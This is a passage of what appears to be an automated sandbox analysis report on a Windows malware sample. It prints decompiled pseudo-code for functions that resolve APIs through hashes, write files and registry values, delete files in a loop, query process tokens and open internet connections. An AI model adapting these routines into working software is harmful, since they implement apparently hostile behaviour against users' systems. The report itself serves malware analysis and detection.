				_v20 = E000D9D50(0x647400c8);
				_t25 = E000D9D50(0x647400a5);
				_t27 = E000DBF50(_t81, _t25, E000D9D50(0x6e1cdffb));
				_t66 = _t62 + 0x14;
				_t53 =  &_v774;
				_t28 =  *_t27(_t53, _t59);
				_t82 = _t28;
				if(_t28 == 0) {
					E000E7700(_t53, E000D7200(0xf075e,  &_v52), 0xffffffff);
					_t66 = _t66 + 0x14;
				}
				_t30 = E000D7200(0xf0a40,  &_v574);
				_t33 = E000D5350(_t82, 0x80000002, _t30, E000D7200(0xf0500,  &_v196)); // executed
				_v32 = _t33;
				_t36 = E000DE360(E000D7200(0xf07b0,  &_v256), _t82, 0x80000002, _t30, _t35); // executed
				_v28 = _t36;
				_t38 = E000D7200(0xf0990,  &_v158);
				_t40 = E000ECC50( &_v32, _t82,  &_v32, 8);
				_push(_t53);
				_push(_t40);
				_t60 = _v24;
				_v20 = E000ED650( &_v456, _v24, 0x65, _t38,  &_v456);
				_t43 = E000D55C0(_t42, 0xffffffff);
				if((_t43 & 0x00000001) != 0) {
					return E000E7700(_t60, E000D7200(0xf08a0,  &_v86), 0xffffffff);
				}
				return _t43;
			}

0x000e3bcc
0x000e3bcf
0x000e3bdd
0x000e3be2
0x000e3be5
0x000e3bf0
0x000e3bf2
0x000e3bf4
0x000e3c0b
0x000e3c10
0x000e3c10
0x000e3c20
0x000e3c28
0x000e3c41
0x000e3c46
0x000e3c49
0x000e3c51
0x000e3c53
0x000e3c55
0x000e3c6c
0x000e3c71
0x000e3c71
0x000e3c80
0x000e3ca5
0x000e3cad
0x000e3ccb
0x000e3cd3
0x000e3ce2
0x000e3cf2
0x000e3cfa
0x000e3cfb
0x000e3d06
0x000e3d12
0x000e3d18
0x000e3d22
0x00000000
0x000e3d3e
0x000e3d4b

APIs

GetComputerNameW.KERNEL32(?,00000064), ref: 000E3BF0

Strings

d, xrefs: 000E3BCF

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: ComputerName
String ID: d
API String ID: 3545744682-2564639436
Opcode ID: c1e0d14b8a2eb68377387f31a33c8622280854d343638d516e23080c870a46d1
Instruction ID: 2fec7356f99482dbbb06dad45eec05974dbb9b8b39bf1663779f56430b09e420
Opcode Fuzzy Hash: c1e0d14b8a2eb68377387f31a33c8622280854d343638d516e23080c870a46d1
Instruction Fuzzy Hash: 2231A6E6C442597AE711A6A0AC07DFF766C9B51315F050136FD18B6383FA215B188AF2

Uniqueness

Uniqueness Score: -1.00%

Function 000E5180, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000E5180(void* __ecx, intOrPtr __edx, char* _a4, char _a8) {
				intOrPtr _v20;
				char _v50;
				short _v52;
				char _v572;
				int _t10;
				void* _t16;
				char* _t20;
				void* _t25;
				WCHAR* _t27;
				void* _t28;
				void* _t29;
				void* _t31;

				_t20 = _a4;
				_t25 = __ecx;
				_v20 = __edx;
				_v52 = 0;
				_t34 = _t20;
				if(_t20 == 0) {
					_t20 =  &_v52;
					_v52 = 0x2e;
					E000D5CD0(_t34, 0,  &_v50, 2, 3);
					_t28 = _t28 + 0x10;
				}
				_t27 =  &_v572;
				_t10 = E000D1490(2, _t25, _t27, 0, 3, 5); // executed
				_t29 = _t28 + 0x18;
				_t35 = _t10;
				if(_t10 != 0) {
					E000DBF50(_t35, 0, E000D9D50(0x677c729b));
					_t31 = _t29 + 0xc;
					_t10 = CreateDirectoryW(_t27, 0); // executed
					if(_t10 != 0) {
						_t37 = _a8;
						if(_a8 != 0) {
							E000E0F60(_t37, _t27, 1, 1); // executed
							_t31 = _t31 + 0xc;
						}
						E000EECC0(E000D9D50(0x647401a8));
						_t16 = E000D1490(0, _t27, E000EFCF0(_v20), _t20, 3, 5); // executed
						return _t16;
					}
				}
				return _t10;
			}

0x000e518c
0x000e518f
0x000e5191
0x000e5194
0x000e519a
0x000e519c
0x000e519e
0x000e51a1
0x000e51b1
0x000e51b6
0x000e51b6
0x000e51b9
0x000e51c9
0x000e51ce
0x000e51d1
0x000e51d3
0x000e51e5
0x000e51ea
0x000e51f0
0x000e51f4
0x000e51f6
0x000e51fa
0x000e5201
0x000e5206
0x000e5206
0x000e521c
0x000e5231
0x00000000
0x000e5236
0x000e51f4
0x000e5243

APIs

CreateDirectoryW.KERNEL32(?,00000000), ref: 000E51F0

Strings

., xrefs: 000E51A1

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: CreateDirectory
String ID: .
API String ID: 4241100979-248832578
Opcode ID: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction ID: bd144f0eea8ec5c673056abdd662c724fa1127f4e15a200418495861f328868a
Opcode Fuzzy Hash: 3acc9fe88f1adef59864c2781f8d3f52916a3d1e9f74662e92389375f329ca32
Instruction Fuzzy Hash: 3C11C4A5A403543AFB207695AC4BFEF766C9F41719F140025FE087A2C3FAA15A0485F2

Uniqueness

Uniqueness Score: -1.00%

Function 000E9600, Relevance: 3.1, APIs: 2, Instructions: 93
fileCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E000E9600(void* __eax, void* __eflags, WCHAR* _a4, void* _a8, long _a12) {
				long _v20;
				long _t8;
				long _t9;
				long _t10;
				void* _t11;
				intOrPtr* _t20;
				int _t22;
				signed char _t24;
				long _t25;
				void* _t28;
				void* _t30;
				void* _t31;
				void* _t35;

				_push(__eax);
				E000DBF50(__eflags, 0, 0xad68947);
				_t8 = E000D9D50(0x247400ac);
				_t9 = E000D9D50(0x647400ae);
				_t10 = E000D9D50(0x6474002c);
				_t35 = _t31 + 0x14;
				_t11 = CreateFileW(_a4, _t8, 1, 0, _t9, _t10, 0); // executed
				if(_t11 == 0xffffffff) {
					_t24 = 0;
					L9:
					return E000D3660(_t46, E000D5080(_t46, 0x48, E000D2FE0(_t11, _t46, 0x48, 0xff) & 0x000000ff) & _t24 & 0x000000ff, 0) & 0x00000001;
				}
				_t28 = _a8;
				_t30 = _t11;
				if(_t28 == 0) {
					L4:
					_t24 = 1;
					L7:
					_t20 = E000DBF50(_t45, 0, E000D9D50(0x6ffa7d19));
					_t35 = _t35 + 0xc;
					_t11 =  *_t20(_t30);
					_t46 = _t24;
					if(_t24 == 0) {
						_t11 = E000EAE30(_t46, _a4);
						_t35 = _t35 + 4;
					}
					goto L9;
				}
				_t25 = _a12;
				_t44 = _t25;
				if(_t25 == 0) {
					goto L4;
				}
				E000DBF50(_t44, 0, 0xabb2b5);
				_t35 = _t35 + 8;
				_t22 = WriteFile(_t30, _t28, _t25,  &_v20, 0); // executed
				_t45 = _t22;
				if(_t22 == 0) {
					_t24 = 0;
					__eflags = 0;
					goto L7;
				}
				goto L4;
			}

0x000e9606
0x000e960e
0x000e961d
0x000e962c
0x000e963b
0x000e9640
0x000e964f
0x000e9654
0x000e9688
0x000e96b8
0x000e96ee
0x000e96ee
0x000e9656
0x000e9659
0x000e965d
0x000e9684
0x000e9684
0x000e968e
0x000e969e
0x000e96a3
0x000e96a7
0x000e96a9
0x000e96ab
0x000e96b0
0x000e96b5
0x000e96b5
0x00000000
0x000e96ab
0x000e965f
0x000e9662
0x000e9664
0x00000000
0x00000000
0x000e966d
0x000e9672
0x000e967e
0x000e9680
0x000e9682
0x000e968c
0x000e968c
0x00000000
0x000e968c
0x00000000

APIs

CreateFileW.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000), ref: 000E964F
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,00000000), ref: 000E967E

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: File$CreateWrite
String ID:
API String ID: 2263783195-0
Opcode ID: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction ID: 1cc77e20da81179a0c7d94e56ef003b29ab497a8100a4c3fef840ff96ce112eb
Opcode Fuzzy Hash: bfeb5540bc80b74d15f1affca5b21e5282fa28de42bf632360cdcd3cb50a2787
Instruction Fuzzy Hash: 3F21D8E6A403457AFA6126616C53FFE31488BA1759F1A0436FE0C66383F9529E1846B3

Uniqueness

Uniqueness Score: -1.00%

Function 000EB790, Relevance: 3.1, APIs: 2, Instructions: 91
networkCOMMON

Download Yara Rule

C-Code - Quality: 49%

			E000EB790(void* __eflags, intOrPtr _a4, char* _a8, signed short _a12, signed int _a16) {
				void* _t10;
				void* _t12;
				intOrPtr* _t14;
				signed int _t18;
				void* _t19;
				void* _t20;
				intOrPtr* _t22;
				intOrPtr _t30;
				signed int _t31;
				char* _t32;
				void* _t36;
				void* _t37;
				void* _t38;

				_t30 = _a4;
				E000DBF50(__eflags, 0x13, 0xd0ca371);
				_t38 = _t37 + 8;
				_t26 =  !=  ? _t30 : 0xf0580;
				_t10 = InternetOpenA( !=  ? _t30 : 0xf0580,  !_a16 & 0x00000001, 0, 0, 0); // executed
				if(_t10 == 0) {
					L6:
					return 0;
				}
				_t36 = _t10;
				_t31 = 0;
				do {
					_t12 = E000D9D50(0x647400bf);
					_t14 = E000DBF50(0, _t12, E000D9D50(0x61c0d6ad));
					 *_t14(_t36,  *((intOrPtr*)(0xf07fc + _t31 * 8)), 0xf0800 + _t31 * 8, 4);
					_t18 = E000D1460(0, E000D22E0(0, _t31, 0x6ac13eca) + 1, 0x6ac13eca);
					_t38 = _t38 + 0x20;
					_t31 = _t18;
					_t50 = _t18 - 3;
				} while (_t18 != 3);
				_t32 = _a8;
				_t19 = E000DABC0(_t50, _t32);
				_t20 = 0;
				_t51 = _t19;
				if(_t19 > 0) {
					E000DBF50(_t51, 0x13, 0xae775e1);
					_t20 = InternetConnectA(_t36, _t32, _a12 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
					if(0 == 0) {
						_t22 = E000DBF50(0, 0x13, 0x714b685);
						 *_t22(_t36);
						goto L6;
					}
				}
				return _t20;
			}

0x000eb799
0x000eb7a5
0x000eb7aa
0x000eb7b7
0x000eb7c2
0x000eb7c6
0x000eb87a
0x00000000
0x000eb87a
0x000eb7cc
0x000eb7ce
0x000eb7d0
0x000eb7d5
0x000eb7ee
0x000eb808
0x000eb81f
0x000eb824
0x000eb827
0x000eb829
0x000eb829
0x000eb82e
0x000eb832
0x000eb83c
0x000eb83e
0x000eb840
0x000eb849
0x000eb862
0x000eb866
0x000eb86f
0x000eb878
0x00000000
0x000eb878
0x000eb866
0x000eb880

APIs

InternetOpenA.WININET(000F0580,?,00000000,00000000,00000000,?,000DCD77,?,?,?,00000001,00000000,?,000DCD77,?,00000001), ref: 000EB7C2
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,00000004), ref: 000EB862

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: Internet$ConnectOpen
String ID:
API String ID: 2790792615-0
Opcode ID: 8606b9b925057f251a97378e8a115e2949c87d337ecf9a1e2b5a49de545ab9ec
Instruction ID: bfb7580c476cf819b0e3f09f182f48c3bf1dfb93381825aedd531f21539bf34f
Opcode Fuzzy Hash: 8606b9b925057f251a97378e8a115e2949c87d337ecf9a1e2b5a49de545ab9ec
Instruction Fuzzy Hash: 4F21EBB6B4031576FA2066716C23FBF3549CBA1759F160035FA09E6383FE91EA0195B2

Uniqueness

Uniqueness Score: -1.00%

Function 000D21E0, Relevance: 3.1, APIs: 2, Instructions: 89
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E000D21E0(intOrPtr _a4, void* _a8, short* _a12, short* _a16, signed char _a20, signed char _a24) {
				void* _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				int _v36;
				long _t20;
				int _t25;
				long _t26;
				intOrPtr* _t27;
				intOrPtr* _t30;
				long _t32;
				long _t33;
				void* _t42;
				void* _t43;
				void* _t47;

				E000DBF50(_t47, 9, 0x7b43ce7);
				_t43 = _t42 + 8;
				_t20 = RegCreateKeyExW(_a8, _a12, 0, 0, 0, 4, 0,  &_v20, 0); // executed
				if(_t20 == 0) {
					_t32 = 0x64;
					_v28 = _a24 & 0x000000ff;
					_v24 = _a20 & 0x000000ff;
					do {
						E000D5CD0(__eflags, _a4, _a16, _v24, _v28);
						E000DBF50(__eflags, 9, 0x7b43ce7);
						_t25 = E000D9D50(0x647400af);
						_t43 = _t43 + 0x1c;
						_t26 = RegCreateKeyExW(_v20, _a16, 0, 0, 0, _t25, 0,  &_v32,  &_v36); // executed
						__eflags = _t26;
						if(__eflags != 0) {
							goto L3;
						} else {
							_t30 = E000DBF50(__eflags, 9, 0x3111c69);
							_t43 = _t43 + 8;
							 *_t30(_v32);
							__eflags = _v36 - 1;
							if(__eflags != 0) {
								goto L3;
							} else {
								_t33 = 1;
							}
						}
						L8:
						_t27 = E000DBF50(__eflags, 9, 0x3111c69);
						 *_t27(_v20);
						goto L9;
						L3:
						_t32 = _t32 - 1;
						__eflags = _t32;
					} while (__eflags != 0);
					_t33 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t33 = 0;
				}
				L9:
				return _t33;
			}

0x000d21f6
0x000d21fb
0x000d2210
0x000d2214
0x000d2225
0x000d222a
0x000d222d
0x000d2243
0x000d2250
0x000d225f
0x000d2271
0x000d2276
0x000d228e
0x000d2290
0x000d2292
0x00000000
0x000d2294
0x000d229b
0x000d22a0
0x000d22a6
0x000d22a8
0x000d22ac
0x00000000
0x000d22ae
0x000d22ae
0x000d22ae
0x000d22ac
0x000d22b4
0x000d22bb
0x000d22c6
0x00000000
0x000d2240
0x000d2240
0x000d2240
0x000d2240
0x000d22b2
0x000d22b2
0x00000000
0x000d2216
0x000d2216
0x000d2216
0x000d22c8
0x000d22d1

APIs

RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000004,00000000,?,00000000), ref: 000D2210
RegCreateKeyExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 000D228E

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction ID: 85ee619c4f411c28012100e8d76fbedeff1642484412c552b23b00558750855c
Opcode Fuzzy Hash: c21274959b6386e64019958d2eec60caeb902cba88aa17351dd5b120125669bc
Instruction Fuzzy Hash: B121B671A40309BFEB20AB90DC43FFE7664EB24710F140036FE14763D2E2A1AA25D6B1

Uniqueness

Uniqueness Score: -1.00%

Function 000E5420, Relevance: 3.1, APIs: 2, Instructions: 72
fileCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E000E5420(WCHAR* _a4) {
				void* _t4;
				signed char _t5;
				long _t7;
				intOrPtr* _t10;
				intOrPtr* _t12;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;
				WCHAR* _t18;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t23;

				_t18 = _a4;
				_t17 = 0;
				while(1) {
					E000DBF50(0, 0, 0xad68947);
					_t4 = CreateFileW(_t18, 0x40000000, 7, 0, 2, 0x4000000, 0); // executed
					_t19 = _t4;
					_t5 = E000D4A90(_t4, 0);
					_t22 = _t20 + 0x10;
					_t28 = _t5 & 0x00000001;
					if((_t5 & 0x00000001) == 0) {
						_t15 = E000DBF50(_t28, 0, 0xb8e7db5);
						_t22 = _t22 + 8;
						 *_t15(_t19);
					}
					E000DBF50(_t28, 0, 0xbf8ba27);
					_t23 = _t22 + 8;
					_t7 = GetFileAttributesW(_t18); // executed
					_t29 = _t7 - 0xffffffff;
					if(_t7 == 0xffffffff) {
						break;
					}
					_t10 = E000DBF50(_t29, 0, 0xad64007);
					 *_t10(_t18);
					_t12 = E000DBF50(_t29, 0, 0x7a2bc0);
					 *_t12(0xbb8);
					_t17 = _t17 + 1;
					_t14 = E000D9D50(0x647400a6);
					_t20 = _t23 + 0x14;
					if(_t17 != _t14) {
						continue;
					}
					break;
				}
				E000DB570(_t18);
				return 0;
			}

0x000e5426
0x000e5429
0x000e5430
0x000e5437
0x000e5452
0x000e5454
0x000e5459
0x000e545e
0x000e5461
0x000e5463
0x000e546c
0x000e5471
0x000e5475
0x000e5475
0x000e547e
0x000e5483
0x000e5487
0x000e5489
0x000e548c
0x00000000
0x00000000
0x000e5495
0x000e549e
0x000e54a7
0x000e54b4
0x000e54b6
0x000e54bc
0x000e54c1
0x000e54c6
0x00000000
0x00000000
0x00000000
0x000e54c6
0x000e54cd
0x000e54db

APIs

CreateFileW.KERNEL32(?,40000000,00000007,00000000,00000002,04000000,00000000), ref: 000E5452
GetFileAttributesW.KERNEL32(?), ref: 000E5487

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction ID: 43798a7f4e1ece0b199aae6cedd2c510966c6c6b562aa1ff150032efd1307ad1
Opcode Fuzzy Hash: fde2cf5772e31156128805affba83f59b84452cbd6b3a1262e2b678172fd21ee
Instruction Fuzzy Hash: A4014CA6A8431476E16032B46C43FBE31988BA2B1FF160536FA5CB52C7FA857A1504B7

Uniqueness

Uniqueness Score: -1.00%

Function 000E3D80, Relevance: 3.1, APIs: 2, Instructions: 72
registryCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E000E3D80(void* __eflags, void* _a4, short* _a8, short* _a12, int _a16, char* _a20, int _a24) {
				void* _t12;
				signed char _t13;
				void* _t14;
				long _t17;
				void* _t18;
				signed int _t21;
				intOrPtr* _t22;
				char* _t28;
				signed int _t29;

				_t44 = __eflags;
				_t13 = E000E5000(_t12, __eflags, 0xffffffff);
				_t14 = E000D9D50(0x647400a5);
				E000DBF50(_t44, _t14, E000D9D50(0x63c03c4b));
				_t17 = RegCreateKeyExW(_a4, _a8, 0, 0, 0, (_t13 & 0x000000ff) << 0x00000008 | 0x00000002, 0,  &_a4, 0); // executed
				if(_t17 == 0) {
					_t28 = _a20;
					_t18 = E000D9D50(0x647400a5);
					E000DBF50(__eflags, _t18, E000D9D50(0x69a6701b));
					_t21 = RegSetValueExW(_a4, _a12, 0, _a16, _t28, _a24); // executed
					__eflags = _t21;
					_t10 = _t21 == 0;
					__eflags = _t10;
					_t29 = _t28 & 0xffffff00 | _t10;
					_t22 = E000DBF50(_t10, 9, 0x3111c69);
					 *_t22(_a4);
				} else {
					_t29 = 0;
				}
				return _t29;
			}

0x000e3d80
0x000e3d8b
0x000e3da1
0x000e3dba
0x000e3dd5
0x000e3dd9
0x000e3ddf
0x000e3dea
0x000e3e03
0x000e3e18
0x000e3e1a
0x000e3e1c
0x000e3e1c
0x000e3e1c
0x000e3e26
0x000e3e31
0x000e3ddb
0x000e3ddb
0x000e3ddb
0x000e3e39

APIs

RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,?,00000002,?,00000000), ref: 000E3DD5
RegSetValueExW.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 000E3E18

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: CreateValue
String ID:
API String ID: 2259555733-0
Opcode ID: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction ID: 8beb15d28c921d7091db5f9445fc9118b3824d31fcc833c29f206de7ce99fe1b
Opcode Fuzzy Hash: 96e8cb35c373eb8ba011f26dd568d909fbde63113441cb5beea8bdcf5d9670c8
Instruction Fuzzy Hash: 291106B69003447FEB116AA0EC43FEF364CDB51759F160134FE18A5393E651EA2486F2

Uniqueness

Uniqueness Score: -1.00%

Function 000DAD80, Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E000DAD80(void* __eflags, intOrPtr _a4, void* _a8) {
				void* _v16;
				long _v20;
				void* _t10;
				intOrPtr* _t12;
				void* _t13;
				void* _t15;
				int _t19;
				void* _t24;
				void* _t26;
				void* _t27;
				void* _t30;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v20 = 0;
				_v16 = 0;
				_t10 = E000D9D50(0x647400a5);
				_t12 = E000DBF50(_t33, _t10, E000D9D50(0x6b5f7e12));
				_t30 = _t27 + 0x10;
				_t13 =  *_t12(_a4, 8,  &_v16);
				_t34 = _t13;
				if(_t13 == 0) {
					_t26 = 0;
					__eflags = 0;
					L7:
					return _t26;
				}
				_t24 = _a8;
				_t15 = E000EB530(_t13, _t34, _v16); // executed
				_t31 = _t30 + 4;
				_t26 = _t15;
				if(_t24 != 0) {
					_t36 = _t26;
					if(_t26 != 0) {
						E000DBF50(_t36, 9, 0xbd557e);
						_t31 = _t31 + 8;
						_t19 = GetTokenInformation(_v16, 0xc, _t24, 4,  &_v20); // executed
						if(_t19 == 0) {
							E000DB570(_t26);
							_t31 = _t31 + 4;
							_t26 = 0;
						}
					}
				}
				E000DBF50(0, 0, 0xb8e7db5);
				CloseHandle(_v16); // executed
				goto L7;
			}

0x000dad80
0x000dad8b
0x000dad92
0x000dad9e
0x000dadb7
0x000dadbc
0x000dadc6
0x000dadc8
0x000dadca
0x000dae26
0x000dae26
0x000dae28
0x000dae30
0x000dae30
0x000dadcc
0x000dadd2
0x000dadd7
0x000dadda
0x000dadde
0x000dade0
0x000dade2
0x000dadeb
0x000dadf0
0x000dadff
0x000dae03
0x000dae06
0x000dae0b
0x000dae0e
0x000dae0e
0x000dae03
0x000dade2
0x000dae17
0x000dae22
0x00000000

APIs

Part of subcall function 000EB530: GetTokenInformation.KERNELBASE(000DADD7,00000001,00000000,00000000,?,000DADD7,00000000), ref: 000EB55A
Part of subcall function 000EB530: GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000EB5B5

GetTokenInformation.KERNELBASE(00000000,0000000C,00000000,00000004,?), ref: 000DADFF

Part of subcall function 000DB570: HeapFree.KERNEL32(00000000,000E54D2,000E54D2,?), ref: 000DB593

CloseHandle.KERNEL32(00000000), ref: 000DAE22

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: InformationToken$CloseFreeHandleHeap
String ID:
API String ID: 2052167596-0
Opcode ID: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction ID: bfe70ba34bc11faf0b81ed91480fa1b0a51747ba504b44df58c34016cebfe4e6
Opcode Fuzzy Hash: e3736755abdd83e2246f2091c3adb6a3e94098db51c60689e66f7798f5d69735
Instruction Fuzzy Hash: 59110672E0031477EB2167A0AC02BAF77699F51704F050135FD1866346FB71AA24C6F2

Uniqueness

Uniqueness Score: -1.00%

Function 000EB530, Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000EB530(void* __eax, void* __eflags, void* _a4) {
				long _v20;
				int _t11;
				signed char _t16;
				void* _t17;
				int _t19;
				DWORD* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;

				_v20 = 0;
				E000DBF50(__eflags, 9, 0xbd557e);
				_t25 = _t24 + 8;
				_t21 =  &_v20;
				_t11 = GetTokenInformation(_a4, 1, 0, 0, _t21); // executed
				_t23 = 0;
				_t30 = _t11;
				if(_t11 == 0) {
					_t16 = E000D55C0( *((intOrPtr*)(E000DBF50(_t30, 0, E000D9D50(0x68042b4e))))(), 0x7a);
					_t25 = _t25 + 0x14;
					if((_t16 & 0x00000001) != 0) {
						_t17 = E000D8290(_v20);
						_t25 = _t25 + 4;
						_t32 = _t17;
						if(_t17 != 0) {
							_t22 = _t17;
							E000DBF50(_t32, 9, 0xbd557e);
							_t25 = _t25 + 8;
							_t19 = GetTokenInformation(_a4, 1, _t22, _v20, _t21); // executed
							_t23 = _t22;
							if(_t19 == 0) {
								E000DB570(_t22);
								_t25 = _t25 + 4;
								_t23 = 0;
							}
						}
					}
				}
				return _t23;
			}

0x000eb537
0x000eb545
0x000eb54a
0x000eb54d
0x000eb55a
0x000eb55c
0x000eb55e
0x000eb560
0x000eb57f
0x000eb584
0x000eb589
0x000eb58e
0x000eb593
0x000eb596
0x000eb598
0x000eb59a
0x000eb5a3
0x000eb5a8
0x000eb5b5
0x000eb5b9
0x000eb5bb
0x000eb5be
0x000eb5c3
0x000eb5c6
0x000eb5c6
0x000eb5bb
0x000eb598
0x000eb589
0x000eb5d1

APIs

GetTokenInformation.KERNELBASE(000DADD7,00000001,00000000,00000000,?,000DADD7,00000000), ref: 000EB55A

Part of subcall function 000D8290: RtlAllocateHeap.NTDLL(00000008,00000000,?,?,?,?,?,?,?,?), ref: 000D82E8

Part of subcall function 000DBF50: LoadLibraryA.KERNEL32(?), ref: 000DC1A1

GetTokenInformation.KERNELBASE(?,00000001,00000000,?,?), ref: 000EB5B5

Part of subcall function 000DB570: HeapFree.KERNEL32(00000000,000E54D2,000E54D2,?), ref: 000DB593

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: HeapInformationToken$AllocateFreeLibraryLoad
String ID:
API String ID: 4190244075-0
Opcode ID: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction ID: 82da4d1dbfc495ca15051664153fb9a1f33d0d4c68597404d9c33c42ec992355
Opcode Fuzzy Hash: e9df4782b3d0bedd82831b1e8aec7463e4f43b0cfaf2e9cbd653cad5c26c96fd
Instruction Fuzzy Hash: 4B01DB72E807187AEA2166B1BC03FBF799E9F50749F050031FD0CB5293F7519A1485B2

Uniqueness

Uniqueness Score: -1.00%

Function 000DE030, Relevance: 3.1, APIs: 2, Instructions: 54
registryCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E000DE030(void* __eflags, void* _a4, short* _a8, short* _a12) {
				void* _t9;
				long _t12;
				signed int _t14;
				intOrPtr* _t15;
				int _t20;
				signed int _t21;

				_t31 = __eflags;
				_t20 = (E000E5000(_t9, __eflags, 0xffffffff) & 0x000000ff) << 0x00000008 | 0x00000001;
				E000DBF50(_t31, 9, 0xda29a27);
				_t12 = RegOpenKeyExW(_a4, _a8, 0, _t20,  &_a4); // executed
				if(_t12 == 0) {
					E000DBF50(__eflags, 9, 0x8097c7);
					_t14 = RegQueryValueExW(_a4, _a12, 0, 0, 0, 0); // executed
					__eflags = _t14;
					_t7 = _t14 == 0;
					__eflags = _t7;
					_t21 = _t20 & 0xffffff00 | _t7;
					_t15 = E000DBF50(_t7, 9, 0x3111c69);
					 *_t15(_a4);
				} else {
					_t21 = 0;
				}
				return _t21;
			}

0x000de030
0x000de04c
0x000de056
0x000de067
0x000de06b
0x000de07b
0x000de08f
0x000de091
0x000de093
0x000de093
0x000de093
0x000de09d
0x000de0a8
0x000de06d
0x000de06d
0x000de06d
0x000de0b0

APIs

RegOpenKeyExW.KERNEL32(00000000,80000001,00000000,00000000,?,?,?,?), ref: 000DE067
RegQueryValueExW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,?,?,?), ref: 000DE08F

Memory Dump Source

Source File: 00000005.00000002.2363719901.00000000000D0000.00000040.00000001.sdmp, Offset: 000D0000, based on PE: true

Similarity

API ID: OpenQueryValue
String ID:
API String ID: 4153817207-0
Opcode ID: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction ID: eee15abb49b4b56123e5f64448198bf340da444ca4bd0e14e95305c95fd833a6
Opcode Fuzzy Hash: ba845f99c816f10e3afb464f6cd32466dff0bc6268915f2d271595faa71088cd
Instruction Fuzzy Hash: FD01FE766803147EEB106AA5DC43FDA3648DB40B65F150135FE1C692C3E6D1F61585F1

Uniqueness

Uniqueness Score: -1.00%

Function 000D3F90, Relevance: 3.1, APIs: 2, Instructions: 53
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E000D3F90(void* _a4, intOrPtr _a8) {
				intOrPtr _t4;
				long _t8;
				void* _t10;
				void* _t14;
				void* _t15;
				long _t17;

				_t4 = _a8;
				_t25 = _t4;
				if(_t4 == 0) {
					return 0;
				}
				_t8 = E000D22E0(_t25, E000D1460(_t25, _t4, 0x8f5419a3) + 4, 0x8f5419a3);
				_t26 = _a4;
				_t17 = _t8;
				if(_a4 == 0) {
					E000DBF50(__eflags, 0, 0x8685de3);
					_t10 = RtlAllocateHeap( *0xf2124, 8, _t17); // executed
					return _t10;
				}
				E000DBF50(_t26, 0, E000D9D50(0x6caeab8f));
				_t15 =  *0xf2124; // 0x550000
				_t14 = RtlReAllocateHeap(_t15, E000D9D50(0x647400a4), _a4, _t17); // executed
				return _t14;
			}

0x000d3f96
0x000d3f99
0x000d3f9b
0x00000000
0x000d3ffb
0x000d3fb4
0x000d3fbc
0x000d3fc0
0x000d3fc2
0x000d4006
0x000d4017
0x00000000
0x000d4017
0x000d3fd4
0x000d3fdc
0x000d3ff7
0x00000000

APIs

RtlReAllocateHeap.NTDLL(00550000,00000000,00000000,00000000), ref: 000D3FF7
RtlAllocateHeap.NTDLL(00000008,00000000), ref: 000D4017

Memory Dump Source

